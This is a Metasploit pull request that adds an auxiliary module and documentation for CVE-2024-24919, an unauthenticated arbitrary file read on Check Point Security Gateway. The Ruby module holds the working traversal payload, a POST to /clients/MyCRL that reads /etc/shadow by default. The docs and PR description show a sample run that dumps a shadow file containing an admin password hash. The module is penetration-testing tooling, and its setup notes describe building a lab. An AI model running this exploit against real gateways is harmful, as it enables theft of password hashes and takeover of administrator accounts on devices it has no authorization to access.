### PR TITLE
Auxiliary module for CVE-2024-24919 - Check Point Security Gateway arbitrary file read

### DIFF
--- a/documentation/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.md
+++ b/documentation/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.md
@@ -12,16 +12,38 @@ tracked as CVE-2024-24919.
 Whether the read file's contents should be outputted to the console or stored as loot (default: false).
 
 ### TARGETFILE
-The target file to read (default: /etc/shadow). This should be a full Linux file path. Files containing binary data may not be read accurately.
+The target file to read (default: /etc/shadow). This should be a full Linux file path. Files containing binary data may
+not be read accurately.
 
 ## Testing
 To set up a test environment:
-1. Download an affected version of Check Point Security Gateway (Such as Check_Point_R81.20_T631.iso, SHA1: 42e25f45ab6b1694a97f76ca363d58040802e6d6).
-2. Install the ISO within a virtual machine.
-3. Browse to the administrator web dashboard on port 443 and complete the first-time setup tasks.
-4. On a Windows system, download and install a copy of Check Point SmartConsole, then use it to authenticate to Security Gateway.
-5. In SmartConsole, enable and configure the vulnerable Mobile Access or IPSec VPN blades.
-6. Publish and push the configuration changes to the device.
+1. Download an affected version of Check Point Security Gateway (Such as Check_Point_R81.20_T631.iso, SHA1:
+42e25f45ab6b1694a97f76ca363d58040802e6d6).
+1. Install the ISO within a virtual machine.
+1. Browse to the administrator web dashboard on port 443 and complete the first-time setup tasks.
+1. On a Windows system, download and install a copy of Check Point SmartConsole, then use it to authenticate to Security Gateway.
+1. In SmartConsole, enable and configure the vulnerable Mobile Access or IPSec VPN blades. These instructions focus on Mobile Access:
+   1. Open the Gateway Properties:
+      1. Navigate to Gateways & Servers in the left-hand menu.
+      1. Select the gateway you want to configure.
+      1. Right-click on the gateway and select Edit.
+   1. Enable Mobile Access:
+      1. In the General Properties tab, under Network Security, check the box for Mobile Access.
+      1. Click on Mobile Access in the left-hand menu of the gateway properties window to access the Mobile Access settings.
+   1. Configure Mobile Access:
+      1. Set up the authentication methods under Authentication (e.g., LDAP, RADIUS, etc.).
+      1. Configure the Portal Settings, specifying the URL for the Mobile Access Portal.
+      1. Under Applications, define which applications and resources will be accessible via the Mobile Access portal.
+      1. Click OK to close the properties window.
+1. Publish and push the configuration changes to the device.
+   1. In SmartConsole, after completing your configuration, click on the Publish button at the top right corner of the
+      SmartConsole window. This will save your changes to the management database.
+   1. After publishing the changes, click on the Install Policy button located at the top of the SmartConsole window.
+   1. In the Install Policy window, select the policy package you want to install. This is typically your main security policy package.
+   1. Choose the gateways on which you want to install the policy. Make sure to select the gateway that you configured
+      for Mobile Access and/or IPSec VPN.
+   1. Click Install to begin the installation process. Once this process completes the gateway should then be vulnerable to this module.
+
 
 ## Verification Steps
 1. Start msfconsole

--- a/documentation/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.md
+++ b/documentation/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.md
@@ -1,0 +1,87 @@
+## Vulnerable Application
+This module leverages an unauthenticated arbitrary root file read vulnerability for
+Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades
+are enabled on affected devices, traversal payloads can be used to read any files on
+the local file system. Password hashes read from disk may be cracked, potentially
+resulting in administrator-level access to the target device. This vulnerability is
+tracked as CVE-2024-24919.
+
+## Options
+
+### STORE_LOOT
+Whether the read file's contents should be outputted to the console or stored as loot (default: false).
+
+### TARGETFILE
+The target file to read (default: /etc/shadow). This should be a full Linux file path. Files containing binary data may not be read accurately.
+
+## Testing
+To set up a test environment:
+1. Download an affected version of Check Point Security Gateway [here](https://support.checkpoint.com/results/download/124397) (Check_Point_R81.20_T631.iso, SHA1: 42e25f45ab6b1694a97f76ca363d58040802e6d6).
+2. Install the ISO within a virtual machine.
+3. Browse to the administrator web dashboard on port 443 and complete the first-time setup tasks.
+4. On a Windows system, download and install a copy of Check Point SmartConsole, then use it to authenticate to Security Gateway.
+5. In SmartConsole, enable and configure the vulnerable Mobile Access or IPSec VPN blades.
+6. Publish and push the configuration changes to the device.
+
+## Verification Steps
+1. Start msfconsole
+2. `use auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `set TARGETFILE <TARGET_FILE_TO_READ>`
+6. `set STORE_LOOT false` if you want to display file on the console instead of storing it as loot.
+7. `run`
+
+## Scenarios
+### Check Point Security Gateway Linux
+```
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > show options 
+
+Module options (auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT       443              yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   STORE_LOOT  false            yes       Store the target file as loot
+   TARGETFILE  /etc/shadow      yes       The target file to read. This should be a full Linux file path. Files containing binary data may not be read accurately
+   TARGETURI   /                yes       The URI path to Check Point Security Gateway
+   VHOST                        no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set RHOSTS 192.168.181.128
+RHOSTS => 192.168.181.128
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > check
+[+] 192.168.181.128:443 - The target is vulnerable. Arbitrary file read successful!
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
+[*] Running module against 192.168.181.128
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Arbitrary file read successful!
+[+] File read succeeded! 
+admin:$6$hHJHiZdC2kHPD5HQ$/0dtMC53GSaZpLA/MeChOvJNNE4i9qoKL57Dsl853wF/RRNzJJ6CO5/qBmzCM7KdEUmXanF3J8T50ppLh/Sf2/:14559:0:99999:8:::
+monitor:*:19872:0:99999:8:::
+root:*:19872:0:99999:7:::
+cp_routeevt:*:19872:0:99999:7:::
+nobody:*:19872:0:99999:7:::
+postfix:*:19872:0:99999:7:::
+rpm:!!:19872:0:99999:7:::
+shutdown:*:19872:0:99999:7:::
+pcap:!!:19872:0:99999:7:::
+halt:*:19872:0:99999:7:::
+cp_postgres:*:19872:0:99999:7:::
+cp_extensions:*:19872:0:99999:7:::
+cpep_user:*:19872:0:99999:7:::
+vcsa:!!:19872:0:99999:7:::
+_nonlocl:*:19872:0:99999:7:::
+sshd:*:19872:0:99999:7:::
+
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.md
+++ b/documentation/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.md
@@ -16,7 +16,7 @@ The target file to read (default: /etc/shadow). This should be a full Linux file
 
 ## Testing
 To set up a test environment:
-1. Download an affected version of Check Point Security Gateway [here](https://support.checkpoint.com/results/download/124397) (Check_Point_R81.20_T631.iso, SHA1: 42e25f45ab6b1694a97f76ca363d58040802e6d6).
+1. Download an affected version of Check Point Security Gateway (Such as Check_Point_R81.20_T631.iso, SHA1: 42e25f45ab6b1694a97f76ca363d58040802e6d6).
 2. Install the ISO within a virtual machine.
 3. Browse to the administrator web dashboard on port 443 and complete the first-time setup tasks.
 4. On a Windows system, download and install a copy of Check Point SmartConsole, then use it to authenticate to Security Gateway.

--- a/documentation/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.md
+++ b/documentation/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.md
@@ -29,7 +29,7 @@ To set up a test environment:
 3. `set RHOSTS <TARGET_IP_ADDRESS>`
 4. `set RPORT <TARGET_PORT>`
 5. `set TARGETFILE <TARGET_FILE_TO_READ>`
-6. `set STORE_LOOT false` if you want to display file on the console instead of storing it as loot.
+6. `set STORE_LOOT false` if you want to display the target file on the console instead of storing it as loot.
 7. `run`
 
 ## Scenarios

--- a/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb
+++ b/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb
@@ -1,0 +1,108 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Check Point Security Gateway Arbitrary File Read',
+        'Description' => %q{
+          This module leverages an unauthenticated arbitrary root file read vulnerability for
+          Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades
+          are enabled on affected devices, traversal payloads can be used to read any files on
+          the local file system. Password hashes read from disk may be cracked, potentially
+          resulting in administrator-level access to the target device. This vulnerability is
+          tracked as CVE-2024-24919.
+        },
+        'Author' => [ 'remmons-r7' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          # At the time of module development, no IOCs for this local file disclosure are known
+          'SideEffects' => [],
+          'Reliability' => []
+        },
+        'References' => [
+          # Vendor advisory
+          [ 'URL', 'https://support.checkpoint.com/results/sk/sk182336' ],
+          # Rapid7 ETR advisory for CVE-2024-24919
+          [ 'URL', 'https://www.rapid7.com/blog/post/2024/05/30/etr-cve-2024-24919-check-point-security-gateway-information-disclosure/' ],
+          # Publication of first proof-of-concept exploit
+          [ 'URL', 'https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/' ]
+        ]
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('STORE_LOOT', [true, 'Store the target file as loot', false]),
+        OptString.new('TARGETFILE', [true, 'The target file to read. This should be a full Linux file path. Files containing binary data may not be read accurately', '/etc/shadow']),
+        OptString.new('TARGETURI', [true, 'The URI path to Check Point Security Gateway', '/'])
+      ]
+    )
+  end
+
+  def check
+    # Attempt to read the /etc/group file (used in check due to lower likelihood of being flagged vs something like /etc/shadow)
+    res_file = read_file('/etc/group')
+
+    # Check for connection failure
+    return Msf::Exploit::CheckCode::Unknown('Connection failed - unable to complete web request') unless res_file
+
+    # If the response body includes the string "root", we can assume the target is vulnerable
+    unless res_file.body.include?('root')
+      return Msf::Exploit::CheckCode::Safe('Arbitrary file read failed - the target did not respond with the requested file')
+    end
+
+    Msf::Exploit::CheckCode::Vulnerable('Arbitrary file read successful!')
+  end
+
+  def run
+    # After the auto check confirms the target is vulnerable, attempt to leak the specified target file
+    file_name = datastore['TARGETFILE']
+    res_read_file = read_file(file_name)
+
+    # Check for connection failure
+    fail_with(Failure::Unknown, 'Connection failed - unable to complete web request') unless res_read_file
+
+    # If the response indicates that the target file does not exist, fail with NotFound
+    if (res_read_file&.code == 404) || (res_read_file.body.include? 'The URL you requested could not be found on this server.')
+      fail_with(Failure::NotFound, 'The requested file was not found - the target file does not exist or the system cannot read it')
+    end
+
+    # If the vulnerable server responds with a status other than the expected 200 or 404 (for example, a WAF 403), fail with Unknown
+    if res_read_file&.code != 200
+      fail_with(Failure::Unknown, 'The application did not respond as expected - the response did not return a 200 status')
+    end
+
+    # Assign variable with file contents, then store the file in loot or print the contents
+    file_data = res_read_file.body
+
+    if datastore['STORE_LOOT']
+      store_loot(File.basename(file_name), 'text/plain', datastore['RHOST'], file_data, file_name, 'File read from Check Point Security Gateway server')
+      print_good('Stored the file data to loot...')
+    else
+      # A new line is sent before file contents for better readability
+      print_good("File read succeeded! \n#{file_data}")
+    end
+  end
+
+  # Performs a POST request with a traversal payload in the body
+  # Responses should either be a 200 with only the file contents in the body or a 404 for files that do not exist
+  def read_file(fname)
+    send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'clients', 'MyCRL'),
+        'headers' => { 'Connection' => 'close' },
+        'data' => "aCSHELL/../../../../../../../../../..#{fname}"
+      }
+    )
+  end
+end

--- a/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb
+++ b/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb
@@ -76,9 +76,9 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Failure::NotFound, 'The requested file was not found - the target file does not exist or the system cannot read it')
     end
 
-    # If the vulnerable server responds with a status other than the expected 200 or 404 (for example, a WAF 403), fail with Unknown
+    # If the vulnerable server responds with a status other than the expected 200 or 404 (for example, a WAF 403), fail with UnexpectedReply
     if res_read_file&.code != 200
-      fail_with(Failure::Unknown, 'The application did not respond as expected - the response did not return a 200 status')
+      fail_with(Failure::UnexpectedReply, 'The application did not respond with a 200 as expected - the HTTP response code was: #{res_read_file&.code} ')
     end
 
     # Assign variable with file contents, then store the file in loot or print the contents

--- a/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb
+++ b/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb
@@ -27,6 +27,7 @@ class MetasploitModule < Msf::Auxiliary
           'SideEffects' => [],
           'Reliability' => []
         },
+        'DefaultOptions' => { 'SSL' => true },
         'References' => [
           # Vendor advisory
           [ 'URL', 'https://support.checkpoint.com/results/sk/sk182336' ],

--- a/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb
+++ b/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Auxiliary
 
     # If the vulnerable server responds with a status other than the expected 200 or 404 (for example, a WAF 403), fail with UnexpectedReply
     if res_read_file&.code != 200
-      fail_with(Failure::UnexpectedReply, 'The application did not respond with a 200 as expected - the HTTP response code was: #{res_read_file&.code} ')
+      fail_with(Failure::UnexpectedReply, "The application did not respond with a 200 as expected - the HTTP response code was: #{res_read_file&.code}")
     end
 
     # Assign variable with file contents, then store the file in loot or print the contents


### PR DESCRIPTION
This module leverages an unauthenticated arbitrary root file read vulnerability for Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades are enabled on affected devices, traversal payloads can be used to read any files on the local file system. Password hashes read from disk may be cracked, potentially resulting in administrator-level access to the target device. This vulnerability is tracked as CVE-2024-24919.

## Verification

1. Start msfconsole
2. `use auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919`
3. `set RHOSTS <TARGET_IP_ADDRESS>`
4. `set RPORT <TARGET_PORT>`
5. `set TARGETFILE <TARGET_FILE_TO_READ>`
6. `set STORE_LOOT false` if you want to display file on the console instead of storing it as loot.
7. `run`

## Example usage
```
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > show options 

Module options (auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       443              yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   STORE_LOOT  false            yes       Store the target file as loot
   TARGETFILE  /etc/shadow      yes       The target file to read. This should be a full Linux file path. Files containing binary data may not be read accurately
   TARGETURI   /                yes       The URI path to Check Point Security Gateway
   VHOST                        no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set RHOSTS 192.168.181.128
RHOSTS => 192.168.181.128
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > check
[+] 192.168.181.128:443 - The target is vulnerable. Arbitrary file read successful!
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
[*] Running module against 192.168.181.128

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file read successful!
[+] File read succeeded! 
admin:$6$hHJHiZdC2kHPD5HQ$/0dtMC53GSaZpLA/MeChOvJNNE4i9qoKL57Dsl853wF/RRNzJJ6CO5/qBmzCM7KdEUmXanF3J8T50ppLh/Sf2/:14559:0:99999:8:::
monitor:*:19872:0:99999:8:::
root:*:19872:0:99999:7:::
cp_routeevt:*:19872:0:99999:7:::
nobody:*:19872:0:99999:7:::
postfix:*:19872:0:99999:7:::
rpm:!!:19872:0:99999:7:::
shutdown:*:19872:0:99999:7:::
pcap:!!:19872:0:99999:7:::
halt:*:19872:0:99999:7:::
cp_postgres:*:19872:0:99999:7:::
cp_extensions:*:19872:0:99999:7:::
cpep_user:*:19872:0:99999:7:::
vcsa:!!:19872:0:99999:7:::
_nonlocl:*:19872:0:99999:7:::
sshd:*:19872:0:99999:7:::

[*] Auxiliary module execution completed
```

I'll privately share a capture of the module running with a member of the Metasploit team. Thank you!